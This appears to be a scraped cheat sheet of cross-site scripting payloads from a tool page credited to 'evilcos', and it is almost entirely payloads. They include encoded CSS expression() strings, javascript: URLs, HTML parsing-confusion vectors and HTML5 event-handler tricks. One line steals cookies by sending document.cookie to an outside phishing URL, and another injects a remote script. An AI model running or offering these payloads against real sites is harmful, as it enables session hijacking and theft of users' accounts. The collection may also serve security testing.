>"' '';!--"=&{()} '';!--"=&{()} '';!--"=&{(alert(1))} `> HI '"><"' new Image().src="http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie); body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))} a{xxx:expression(if(!window.x){alert('xss');window.x=1;})} a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29} body{background:url("javascript:alert('xss')")} body{background:url(JavAs cr ipt:alert(0))} @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)';
alert(String(/xss/).substr(1,3)) alert(/xss/.source) Test x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)() Test Test
javascript:document.scripts[0].src='http://127.0.0.1/yy.js';void(0); Test javascript:document.cookie=window.prompt("edit cookie:",document.cookie);void(0);
  • XXX
    [!] IE only:
    x <!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(1)//]> --> [!] parsing error: <!--<img src="--><img src=x onerror=alert(1)//"> <comment><img src="</comment><img src=x onerror=alert(1))//"> <![><img src="]><img src=x onerror=alert(1)//"> <style><img src="</style><img src=x onerror=alert(1)//"> <b <script>alert(1)</script>0 <x '="foo"><x foo='><img src=x onerror=alert(1)//'> [!] special tags parsing issues, from: http://html5sec.org/#html <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> <% foo><x foo="%><script>alert(1)</script>"> [!] fuzzing tips: <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <a href=java script:alert(1)>XXX</a> [!] utf-7 bom +/v8 +/v9 +/v+ +/v/ [!] html5sec.org <svg/onload=alert(1)> <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button> <video><source onerror="alert(1)"> <iframe srcdoc="<svg onload=alert(1)>⃒"></iframe> <frameset onload=alert(1)> <!--<img src="--><img src=x onerror=alert(1)//"> <style><img src="</style><img src=x onerror=alert(1)//"> <title><img src=" // by evilcos # Only Edge # Only Edge
    XSS'OR <img src="